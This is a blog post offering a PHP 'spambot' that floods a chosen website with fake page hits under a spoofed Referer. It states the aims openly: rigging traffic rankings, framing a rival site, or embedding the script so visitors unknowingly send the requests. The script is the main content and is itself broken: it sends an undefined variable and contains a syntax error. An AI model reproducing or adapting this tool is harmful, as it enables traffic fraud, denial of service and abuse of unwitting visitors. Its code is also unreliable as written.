Boredworkers.com

For today’s activity, let’s spam a website with spoofed traffic hits from a spoofed referer. Reasons may vary. Maybe there’s a top 10 listing based on traffic that you drive to them and you would like to get into that list. Maybe you want to frame a rival site for spamming. Maybe you’re just bored. Whatever the reason, here’s one way of doing it using a simple PHP script that you can run off the command line (or even embed into your site, with some modifications, so visitors unwittingly kick it off).

// spambot.php
<?php
$SPAM_CNT = 100000; // Number of times you want to traffic spam a site
error_reporting(E_ALL);
$service_port = getservbyname('www', 'tcp');
$siteurl = "www.spamtarget.com"; // The site you want to spam
$referer = "http://www.somesite.com"; // Website you want to set up
$address = gethostbyname($siteurl);
$spamhdr = "GET / HTTP/1.1\r\nHost: $siteurl\r\n";
$spamhdr .= "User-Agent: Mozilla/4.04 [en] (X11; I; SunOS 5.5 sun4m\r\n";
$spamhdr .= "Referer: $referer\r\nConnection: Close\r\n\r\n";
// Spam a site X number of times
for ($i = 1; $i < = $SPAM_CNT; $i++) {
  echo "Spamming: $i ... ";
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0)
    echo "socket_create() failed:\n".socket_strerror($socket)."\n";
  $result = socket_connect($socket, $address, $service_port);
  if ($result < 0)
    echo "socket_connect() failed ($result):\n".socket_strerror($result)."\n";
  socket_write($socket, $spamstr, strlen($spamstr));
  // You can read the response if you like
  //while ($out = socket_read($socket, 2048));
  socket_close($socket);
  $val = rand (5, 60); // Randomise hits
  echo "sleeping $val\n";
  sleep ($val);
}
?>

To run it off command line, simply submit the following command:
php spambot.php

If you’re running the script off a command line from a source a single source machine, the IP address will be static. Most server side scripts that track traffic are pretty smart nowadays and verify unique hits. If that’s the case, then this script’s pretty much useless. There are ways to spoof the IP but we’re not running a hacker class here. In spite of this shortfall, it doesn’t stop you from spamming servers that don’t track unique IP addresses or just spamming servers in general.

If necessary, this script can be easily modified to submit a form or some other complex stuff. I’m sure you can think of its uses.

So there. A PHP spambot for you. It’s in no way perfect but it does the job for little effort and/or resources.